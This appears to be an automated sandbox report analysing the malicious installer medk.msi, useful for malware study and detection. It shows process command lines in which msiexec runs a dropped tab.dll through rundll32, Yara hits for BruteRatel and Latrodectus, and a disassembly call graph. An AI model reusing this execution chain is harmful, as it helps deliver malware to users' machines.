                                                                                                                                          2024-11-13 17:24:04 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:24:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:12:20:01
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\medk.msi"
                                                                                                                                          Imagebase:0x7ff719990000
                                                                                                                                          File size:69'632 bytes
                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:12:20:01
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                          Imagebase:0x7ff719990000
                                                                                                                                          File size:69'632 bytes
                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:12:20:02
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 31D436F1086AC158C6FA541C36CED057
                                                                                                                                          Imagebase:0x8c0000
                                                                                                                                          File size:59'904 bytes
                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:12:20:02
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\Installer\MSI8F42.tmp
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\Installer\MSI8F42.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\tab.dll, Object
                                                                                                                                          Imagebase:0x2f0000
                                                                                                                                          File size:399'328 bytes
                                                                                                                                          MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:12:20:03
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object
                                                                                                                                          Imagebase:0x3b0000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:12:20:03
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object
                                                                                                                                          Imagebase:0x7ff64f140000
                                                                                                                                          File size:71'680 bytes
                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2232622768.000002931397B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2232567502.000002931397B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2232697308.000002931397B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:12:20:12
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                          Imagebase:0x7ff609140000
                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.4591745236.000000000E21B000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Disassembly

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.6%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:38.8%
                                                                                                                                            Total number of Nodes:384
                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                            execution_graph 33111 313084 33112 313090 CallCatchBlock 33111->33112 33137 312de4 33112->33137 33114 313097 33115 3131ea 33114->33115 33125 3130c1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 33114->33125 33168 3133a8 4 API calls 2 library calls 33115->33168 33117 3131f1 33169 322ed9 23 API calls CallUnexpected 33117->33169 33119 3131f7 33170 322e9d 23 API calls CallUnexpected 33119->33170 33121 3131ff 33122 3130e0 33123 313161 33145 3134c3 GetStartupInfoW _Getvals 33123->33145 33125->33122 33125->33123 33167 322eb3 41 API calls 4 library calls 33125->33167 33126 313167 33146 2fcdb0 GetCommandLineW 33126->33146 33138 312ded 33137->33138 33171 3135a9 IsProcessorFeaturePresent 33138->33171 33140 312df9 33172 3158dc 10 API calls 2 library calls 33140->33172 33142 312dfe 33143 312e02 33142->33143 33173 3158fb 7 API calls 2 library calls 33142->33173 33143->33114 33145->33126 33147 2fcdf8 33146->33147 33174 2f1f80 LocalAlloc 33147->33174 33149 2fce09 33175 2f69a0 33149->33175 33151 2fce58 33152 2fce5c 33151->33152 33153 2fce69 33151->33153 33265 2f6600 98 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 33152->33265 33183 2fc6a0 LocalAlloc LocalAlloc 33153->33183 33156 2fce65 33158 2fceb0 ExitProcess 33156->33158 33157 2fce72 33184 2fc870 33157->33184 33163 2fce9a 33266 2fcce0 CreateFileW SetFilePointer WriteFile CloseHandle 33163->33266 33164 2fcea4 33267 2fcec0 LocalFree LocalFree 33164->33267 33167->33123 33168->33117 33169->33119 33170->33121 33171->33140 33172->33142 33173->33143 33174->33149 33177 2f69f2 33175->33177 33176 2f6a34 33178 312937 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 33176->33178 33177->33176 33180 2f6a22 33177->33180 33179 2f6a42 33178->33179 33179->33151 33268 312937 33180->33268 33182 2f6a30 33182->33151 33183->33157 33185 2fc889 33184->33185 33186 2fcb32 33184->33186 33185->33185 33185->33186 33187 2fcb92 33185->33187 33191 2f6a50 33186->33191 33276 2f6250 14 API calls 33187->33276 33189 2fcba2 RegOpenKeyExW 33189->33186 33190 2fcbc0 RegQueryValueExW 33189->33190 33190->33186 33192 2f6a84 33191->33192 33193 2f6aa3 GetCurrentProcess OpenProcessToken 33191->33193 33194 312937 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 33192->33194 33197 2f6adf 33193->33197 33198 2f6b09 33193->33198 33195 2f6a9f 33194->33195 33195->33163 33195->33164 33199 2f6af4 CloseHandle 33197->33199 33200 2f6b02 33197->33200 33277 2f5de0 33198->33277 33199->33200 33325 2f57c0 GetCurrentProcess OpenProcessToken 33200->33325 33203 2f6b2e 33207 2f6b3f 33203->33207 33208 2f6b32 33203->33208 33204 2f6b20 33206 2f1770 42 API calls 33204->33206 33206->33197 33280 2f5f40 ConvertSidToStringSidW 33207->33280 33210 2f1770 42 API calls 33208->33210 33209 2f6c29 33212 2f6ddb 33209->33212 33215 2f6c43 33209->33215 33210->33197 33213 2f2310 56 API calls 33212->33213 33216 2f6e04 33213->33216 33330 2f2310 33215->33330 33223 2f46f0 52 API calls 33216->33223 33264 2f6d8a 33216->33264 33231 2f6e29 33223->33231 33224 2f6b85 33311 2f2e60 33224->33311 33227 2f2e60 42 API calls 33229 2f6bf5 33227->33229 33228 2f6e59 33230 2f2310 56 API calls 33228->33230 33317 2f1770 33229->33317 33237 2f6e68 33230->33237 33231->33228 33412 2f4ac0 42 API calls 3 library calls 33231->33412 33232 2f6cad 33234 2f2310 56 API calls 33232->33234 33238 2f6cc7 33234->33238 33242 2f46f0 52 API calls 33237->33242 33237->33264 33243 2f46f0 52 API calls 33238->33243 33238->33264 33239 2f6c16 CloseHandle 33239->33200 33240 2f6c7c 33240->33232 33240->33240 33409 2f4ac0 42 API calls 3 library calls 33240->33409 33246 2f6e8a 33242->33246 33252 2f6ce9 33243->33252 33244 2f6eb9 33245 2f2310 56 API calls 33244->33245 33247 2f6ec4 33245->33247 33246->33244 33413 2f4ac0 42 API calls 3 library calls 33246->33413 33254 2f46f0 52 API calls 33247->33254 33247->33264 33248 2f6d19 33249 2f2310 56 API calls 33248->33249 33251 2f6d24 33249->33251 33255 2f46f0 52 API calls 33251->33255 33251->33264 33252->33248 33410 2f4ac0 42 API calls 3 library calls 33252->33410 33258 2f6ee6 33254->33258 33262 2f6d46 33255->33262 33256 2f6f10 33415 2f52f0 33256->33415 33258->33256 33258->33258 33414 2f4ac0 42 API calls 3 library calls 33258->33414 33259 2f6d70 33363 2f4ba0 33259->33363 33262->33259 33411 2f4ac0 42 API calls 3 library calls 33262->33411 33462 2f11d0 RaiseException _com_raise_error 33264->33462 33265->33156 33266->33164 33267->33158 33269 312940 IsProcessorFeaturePresent 33268->33269 33270 31293f 33268->33270 33272 3129a5 33269->33272 33270->33182 33275 312968 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33272->33275 33274 312a88 33274->33182 33275->33274 33276->33189 33463 2f5e40 GetTokenInformation 33277->33463 33281 2f5fac 33280->33281 33282 2f5fd2 33280->33282 33284 2f24c0 47 API calls 33281->33284 33283 2f24c0 47 API calls 33282->33283 33285 2f5fc9 33283->33285 33284->33285 33286 2f5ff5 LocalFree 33285->33286 33287 2f6003 33285->33287 33286->33287 33288 2f24c0 33287->33288 33291 2f24d1 codecvt 33288->33291 33293 2f24fd 33288->33293 33289 2f25f5 33474 2f2770 42 API calls 33289->33474 33291->33224 33292 2f2515 33295 2f25f0 33292->33295 33296 2f2566 LocalAlloc 33292->33296 33293->33289 33293->33292 33293->33295 33298 2f2582 33293->33298 33294 2f25fa 33475 317027 41 API calls 2 library calls 33294->33475 33473 2f2d70 RaiseException _com_raise_error 33295->33473 33296->33294 33300 2f2577 33296->33300 33302 2f2586 LocalAlloc 33298->33302 33307 2f2593 codecvt 33298->33307 33300->33307 33302->33307 33307->33294 33308 2f25e5 33307->33308 33309 2f25d8 33307->33309 33308->33224 33309->33308 33310 2f25de LocalFree 33309->33310 33310->33308 33312 2f2eb7 33311->33312 33316 2f2e8d 33311->33316 33312->33227 33313 2f2eaa 33313->33312 33314 2f2eb0 LocalFree 33313->33314 33314->33312 33316->33311 33316->33313 33476 317027 41 API calls 2 library calls 33316->33476 33318 2f179b 33317->33318 33322 2f17c1 33317->33322 33319 2f17ba LocalFree 33318->33319 33320 2f17e5 33318->33320 33321 2f17b4 33318->33321 33319->33322 33477 317027 41 API calls 2 library calls 33320->33477 33321->33319 33321->33322 33322->33200 33322->33239 33326 2f57e7 GetTokenInformation 33325->33326 33327 2f57e1 33325->33327 33328 2f581e CloseHandle 33326->33328 33329 2f5816 33326->33329 33327->33209 33328->33209 33329->33328 33331 2f239c 33330->33331 33332 2f2348 33330->33332 33344 2f2427 33331->33344 33481 312c98 6 API calls 33331->33481 33478 312c98 6 API calls 33332->33478 33334 2f2352 33334->33331 33336 2f235e GetProcessHeap 33334->33336 33479 312faa 44 API calls 33336->33479 33337 2f23b6 33337->33344 33482 312faa 44 API calls 33337->33482 33340 2f238b 33480 312c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 33340->33480 33341 2f2416 33483 312c4e EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 33341->33483 33344->33264 33345 2f46f0 33344->33345 33346 2f4766 33345->33346 33347 2f4700 33345->33347 33346->33240 33347->33346 33484 2fd156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 33347->33484 33349 2f4730 FindResourceExW 33350 2f471a 33349->33350 33350->33346 33350->33349 33353 2f4771 33350->33353 33485 2f45b0 LoadResource LockResource SizeofResource 33350->33485 33486 2fd156 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 33350->33486 33353->33346 33354 2f4775 FindResourceW 33353->33354 33354->33346 33355 2f4783 33354->33355 33487 2f45b0 LoadResource LockResource SizeofResource 33355->33487 33357 2f4790 33357->33346 33488 317383 41 API calls 3 library calls 33357->33488 33359 2f47d1 33360 2f47e2 33359->33360 33489 2f11d0 RaiseException _com_raise_error 33359->33489 33360->33240 33364 2f57c0 4 API calls 33363->33364 33365 2f4bed 33364->33365 33366 2f4c15 CoInitialize CoCreateInstance 33365->33366 33367 2f4bf3 33365->33367 33369 2f4c4f 33366->33369 33370 2f4c58 VariantInit 33366->33370 33368 2f52f0 89 API calls 33367->33368 33371 2f4c0d 33368->33371 33369->33371 33373 2f5187 CoUninitialize 33369->33373 33372 2f4c9e 33370->33372 33375 312937 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 33371->33375 33374 2f4cb1 IUnknown_QueryService 33372->33374 33382 2f4ca8 VariantClear 33372->33382 33373->33371 33378 2f4ce0 33374->33378 33374->33382 33376 2f51a7 33375->33376 33376->33264 33379 2f4d31 IUnknown_QueryInterface_Proxy 33378->33379 33378->33382 33380 2f4d5a 33379->33380 33379->33382 33381 2f4d7f IUnknown_QueryInterface_Proxy 33380->33381 33380->33382 33381->33382 33383 2f4da8 CoAllowSetForegroundWindow 33381->33383 33382->33369 33384 2f4e28 SysAllocString 33383->33384 33386 2f4dc2 SysAllocString 33383->33386 33384->33386 33387 2f51b0 _com_issue_error 33384->33387 33388 2f4def 33386->33388 33389 2f4df8 SysAllocString 33386->33389 33494 2f11d0 RaiseException _com_raise_error 33387->33494 33388->33387 33388->33389 33391 2f4e3d VariantInit 33389->33391 33392 2f4e1d 33389->33392 33396 2f4ebd 33391->33396 33392->33387 33392->33391 33394 2f4ec1 VariantClear VariantClear VariantClear VariantClear SysFreeString 33394->33382 33396->33394 33404 2f4f1b 33396->33404 33397 2f24c0 47 API calls 33397->33404 33400 2f2e60 42 API calls 33400->33404 33401 2f4fd5 OpenProcess WaitForSingleObject 33403 2f500b GetExitCodeProcess 33401->33403 33401->33404 33403->33404 33404->33394 33404->33396 33404->33397 33404->33400 33404->33401 33405 2f51ab 33404->33405 33406 2f506e LocalFree 33404->33406 33407 2f5025 CloseHandle 33404->33407 33490 2f12f0 49 API calls 2 library calls 33404->33490 33491 2f3860 99 API calls 2 library calls 33404->33491 33492 2f4270 10 API calls 33404->33492 33493 317027 41 API calls 2 library calls 33405->33493 33406->33404 33407->33404 33409->33232 33410->33248 33411->33259 33412->33228 33413->33244 33414->33256 33416 2f5361 33415->33416 33495 2f5d30 33416->33495 33418 2f537b 33419 2f5d30 41 API calls 33418->33419 33420 2f538b 33419->33420 33499 2f59c0 33420->33499 33422 2f57b0 33518 2f11d0 RaiseException _com_raise_error 33422->33518 33424 2f539b 33424->33422 33507 317852 33424->33507 33428 2f53e1 33429 2f5d30 41 API calls 33428->33429 33441 2f53f5 33429->33441 33430 2f551d GetForegroundWindow 33461 2f5529 33430->33461 33431 2f55f7 ShellExecuteExW 33432 2f5609 33431->33432 33436 2f5612 33431->33436 33516 2f5890 6 API calls 33432->33516 33433 2f5493 GetWindowsDirectoryW 33514 2f5b10 70 API calls 33433->33514 33435 2f5625 ShellExecuteExW 33438 2f563d 33435->33438 33440 2f5646 33435->33440 33436->33435 33436->33440 33517 2f5890 6 API calls 33438->33517 33439 2f54b4 33515 2f5b10 70 API calls 33439->33515 33444 2f56fd 33440->33444 33445 2f566c GetModuleHandleW GetProcAddress 33440->33445 33441->33433 33446 2f54cc 33441->33446 33447 2f5721 33444->33447 33448 2f570e WaitForSingleObject GetExitCodeProcess 33444->33448 33450 2f568a AllowSetForegroundWindow 33445->33450 33446->33430 33446->33461 33510 2f5940 33447->33510 33448->33447 33450->33444 33451 2f5698 33450->33451 33451->33444 33452 2f56a1 GetModuleHandleW GetProcAddress 33451->33452 33453 2f56fa 33452->33453 33454 2f56b4 33452->33454 33453->33444 33458 2f56ed 33454->33458 33459 2f56c8 Sleep EnumWindows 33454->33459 33456 312937 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 33457 2f57a8 33456->33457 33457->33264 33458->33453 33460 2f56f3 BringWindowToTop 33458->33460 33459->33454 33459->33458 33587 2f5830 GetWindowThreadProcessId GetWindowLongW 33459->33587 33460->33453 33461->33431 33464 2f5ebe GetLastError 33463->33464 33465 2f5e18 33463->33465 33464->33465 33467 2f5ec9 33464->33467 33465->33203 33465->33204 33466 2f5f0e GetTokenInformation 33466->33465 33467->33466 33468 2f5ee9 33467->33468 33469 2f5ed9 _Getvals 33467->33469 33472 2f60d0 45 API calls 3 library calls 33468->33472 33469->33466 33471 2f5ef2 33471->33466 33472->33471 33478->33334 33479->33340 33480->33331 33481->33337 33482->33341 33483->33344 33484->33350 33485->33350 33486->33350 33487->33357 33488->33359 33490->33404 33491->33404 33492->33404 33496 2f5d6e 33495->33496 33498 2f5d7d 33496->33498 33519 2f4a10 41 API calls 4 library calls 33496->33519 33498->33418 33500 2f59f8 33499->33500 33504 2f5a03 33499->33504 33501 2f5d30 41 API calls 33500->33501 33502 2f5a01 33501->33502 33502->33424 33503 2f2310 56 API calls 33505 2f5a1a 33503->33505 33504->33503 33504->33505 33520 2f5a60 42 API calls 33505->33520 33521 317869 33507->33521 33511 2f572d 33510->33511 33512 2f5971 33510->33512 33511->33456 33512->33511 33513 2f5981 CloseHandle 33512->33513 33513->33511 33514->33439 33515->33446 33516->33436 33517->33440 33519->33498 33520->33502 33526 317078 33521->33526 33527 317096 33526->33527 33528 31708f 33526->33528 33527->33528 33571 3257cc 41 API calls 3 library calls 33527->33571 33534 3176d9 33528->33534 33530 3170b7 33572 325ab7 41 API calls __Strcoll 33530->33572 33532 3170cd 33573 325b15 41 API calls std::_Locinfo::_W_Getmonths 33532->33573 33535 317709 ___crtLCMapStringW 33534->33535 33538 3176f3 33534->33538 33537 317720 33535->33537 33535->33538 33541 317702 33537->33541 33576 325c2a 6 API calls 2 library calls 33537->33576 33574 317370 14 API calls __dosmaperr 33538->33574 33543 312937 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 33541->33543 33542 31776e 33544 317778 33542->33544 33545 31778f 33542->33545 33548 2f53d3 33543->33548 33577 317370 14 API calls __dosmaperr 33544->33577 33546 3177a5 33545->33546 33547 317794 33545->33547 33551 317826 33546->33551 33554 3177cc 33546->33554 33561 3177b9 __alloca_probe_16 33546->33561 33579 317370 14 API calls __dosmaperr 33547->33579 33548->33422 33548->33428 33584 317370 14 API calls __dosmaperr 33551->33584 33552 31777d 33578 317370 14 API calls __dosmaperr 33552->33578 33553 3176f8 33575 317017 41 API calls ___std_exception_copy 33553->33575 33580 325bdc 15 API calls 2 library calls 33554->33580 33557 31782b 33585 317370 14 API calls __dosmaperr 33557->33585 33560 3177d2 33560->33551 33560->33561 33561->33551 33564 3177e6 33561->33564 33562 317813 33586 312326 14 API calls ~ctype 33562->33586 33581 325c2a 6 API calls 2 library calls 33564->33581 33566 317802 33567 317809 33566->33567 33568 31781a 33566->33568 33582 31b762 41 API calls 2 library calls 33567->33582 33583 317370 14 API calls __dosmaperr 33568->33583 33571->33530 33572->33532 33573->33528 33574->33553 33575->33541 33576->33542 33577->33552 33578->33541 33579->33553 33580->33560 33581->33566 33582->33562 33583->33562 33584->33557 33585->33562 33586->33541 33588 32591d GetLastError 33589 325933 33588->33589 33590 325939 33588->33590 33623 3275d7 6 API calls std::_Lockit::_Lockit 33589->33623 33594 32593d SetLastError 33590->33594 33611 327616 33590->33611 33598 325972 33601 327616 __dosmaperr 6 API calls 33598->33601 33599 325983 33600 327616 __dosmaperr 6 API calls 33599->33600 33602 32598f 33600->33602 33603 325980 33601->33603 33604 325993 33602->33604 33605 3259aa 33602->33605 33624 3253b8 14 API calls __dosmaperr 33603->33624 33606 327616 __dosmaperr 6 API calls 33604->33606 33625 3255fa 14 API calls __dosmaperr 33605->33625 33606->33603 33609 3259b5 33626 3253b8 14 API calls __dosmaperr 33609->33626 33627 3273c6 33611->33627 33614 327650 TlsSetValue 33615 325955 33615->33594 33616 3270bb 33615->33616 33621 3270c8 std::_Locinfo::_W_Getmonths 33616->33621 33617 327108 33636 317370 14 API calls __dosmaperr 33617->33636 33618 3270f3 RtlAllocateHeap 33619 32596a 33618->33619 33618->33621 33619->33598 33619->33599 33621->33617 33621->33618 33635 32bf83 EnterCriticalSection LeaveCriticalSection std::_Locinfo::_W_Getmonths 33621->33635 33623->33590 33624->33594 33625->33609 33626->33594 33628 3273f4 33627->33628 33631 3273f0 33627->33631 33628->33631 33634 3272fb LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsFree 33628->33634 33630 327408 33630->33631 33632 32740e GetProcAddress 33630->33632 33631->33614 33631->33615 33632->33631 33633 32741e std::_Lockit::_Lockit 33632->33633 33633->33631 33634->33630 33635->33621 33636->33619

                                                                                                                                            Executed Functions

                                                                                                                                            Function 002F4BA0 Relevance: 36.5, APIs: 24, Instructions: 502comCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 2f4ba0-2f4bf1 call 2f57c0 3 2f4c15-2f4c4d CoInitialize CoCreateInstance 0->3 4 2f4bf3-2f4c10 call 2f52f0 0->4 6 2f4c4f-2f4c53 3->6 7 2f4c58-2f4ca6 VariantInit 3->7 13 2f5190-2f51aa call 312937 4->13 8 2f5169-2f5172 6->8 16 2f4ca8-2f4cac 7->16 17 2f4cb1-2f4cd5 IUnknown_QueryService 7->17 11 2f517a-2f5185 8->11 12 2f5174-2f5176 8->12 14 2f518d 11->14 15 2f5187 CoUninitialize 11->15 12->11 14->13 15->14 19 2f514b-2f5154 16->19 21 2f4cd7-2f4cdb 17->21 22 2f4ce0-2f4cfa 17->22 24 2f515c-2f5167 VariantClear 19->24 25 2f5156-2f5158 19->25 23 2f513a-2f5143 21->23 28 2f4cfc-2f4d00 22->28 29 2f4d05-2f4d26 22->29 23->19 26 2f5145-2f5147 23->26 24->8 25->24 26->19 30 2f5129-2f5132 28->30 33 2f4d28-2f4d2c 29->33 34 2f4d31-2f4d4f IUnknown_QueryInterface_Proxy 29->34 30->23 31 2f5134-2f5136 30->31 31->23 35 2f5118-2f5121 33->35 36 2f4d5a-2f4d74 34->36 37 2f4d51-2f4d55 34->37 35->30 38 2f5123-2f5125 35->38 42 2f4d7f-2f4d9d IUnknown_QueryInterface_Proxy 36->42 43 2f4d76-2f4d7a 36->43 39 2f5107-2f5110 37->39 38->30 39->35 41 2f5112-2f5114 39->41 41->35 45 2f4d9f-2f4da3 42->45 46 2f4da8-2f4dc0 CoAllowSetForegroundWindow 42->46 44 2f50f6-2f50ff 43->44 44->39 50 2f5101-2f5103 44->50 47 2f50e5-2f50ee 45->47 48 2f4e28-2f4e35 SysAllocString 46->48 49 2f4dc2-2f4dc4 46->49 47->44 51 2f50f0-2f50f2 47->51 53 2f4e3b 48->53 54 2f51ba-2f5201 call 2f11d0 48->54 52 2f4dca-2f4ded SysAllocString 49->52 50->39 51->44 55 2f4def-2f4df2 52->55 56 2f4df8-2f4e1b SysAllocString 52->56 53->52 64 2f5209-2f5217 54->64 65 2f5203-2f5205 54->65 55->56 58 2f51b0-2f51b5 call 2fcf40 55->58 59 2f4e3d-2f4ebf VariantInit 56->59 60 2f4e1d-2f4e20 56->60 58->54 67 2f4eca-2f4ece 59->67 68 2f4ec1-2f4ec5 59->68 60->58 63 2f4e26 60->63 63->59 65->64 70 2f509c 67->70 71 2f4ed4 67->71 69 2f50a0-2f50df VariantClear * 4 SysFreeString 68->69 69->47 70->69 72 2f4ed6-2f4f0c 71->72 73 2f4f10-2f4f19 72->73 73->73 74 2f4f1b-2f4fa2 call 2f24c0 call 2f12f0 call 2f3860 call 2f2e60 * 2 73->74 85 2f4faa 74->85 86 2f4fa4-2f4fa8 74->86 87 2f4fb1-2f4fb3 85->87 86->87 88 2f4fb9-2f4fc3 87->88 89 2f5036-2f5046 87->89 90 2f4fd5-2f5009 OpenProcess WaitForSingleObject 88->90 91 2f4fc5-2f4fd3 call 2f4270 88->91 92 2f508d-2f5096 89->92 93 2f5048-2f5057 89->93 95 2f500b-2f500d GetExitCodeProcess 90->95 96 2f5013-2f5023 90->96 91->90 92->70 92->72 97 2f506a-2f506c 93->97 98 2f5059-2f5064 93->98 95->96 96->89 103 2f5025-2f502c CloseHandle 96->103 100 2f506e-2f506f LocalFree 97->100 101 2f5075-2f5086 97->101 98->97 99 2f51ab call 317027 98->99 99->58 100->101 101->92 103->89
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 002F57C0: GetCurrentProcess.KERNEL32(00000008,?,7642E7B1,?,-00000010), ref: 002F57D0
                                                                                                                                              • Part of subcall function 002F57C0: OpenProcessToken.ADVAPI32(00000000), ref: 002F57D7
                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 002F4C15
                                                                                                                                            • CoCreateInstance.OLE32(003372B0,00000000,00000004,00345104,00000000,?), ref: 002F4C45
                                                                                                                                            • CoUninitialize.COMBASE ref: 002F5187
                                                                                                                                            • _com_issue_error.COMSUPP ref: 002F51B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
